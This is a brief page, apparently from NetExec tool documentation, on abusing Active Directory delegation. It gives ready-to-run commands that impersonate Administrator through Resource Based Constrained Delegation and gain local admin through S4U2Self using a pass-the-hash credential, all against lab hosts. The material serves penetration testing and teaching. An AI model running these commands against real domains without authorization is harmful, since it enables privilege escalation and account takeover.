🆕Delegation

Resource Based Constrained Delegation (RBCD) and

RBCD

If you have an object with the msDS-AllowedToActOnBehalfOfOtherIdentity attribute set to an account you control you can use the impersonate flag inside NetExec to automatically execute the Resource Based Constrained Delegation and impersonate any user:

nxc smb 192.168.56.11 -u jon.snow -p iknownothing --delegate Administrator

S4U2Self

If you have a computer account you can (nearly) always get local administrator with the s4u2self extension:

nxc smb 192.168.56.10 -u 'KINGSLANDING$' -H 220fc1990391bdc183d1a68c389c0229 --delegate Administrator --self

Resources:

(RBCD) Resource-based constrained | The Hacker Recipes

S4U2self abuse | The Hacker Recipes

Resource-based Constrained DelegationHackTricks

PreviousChecking Credentials (Local)NextCommand Execution

Last updated 3 months ago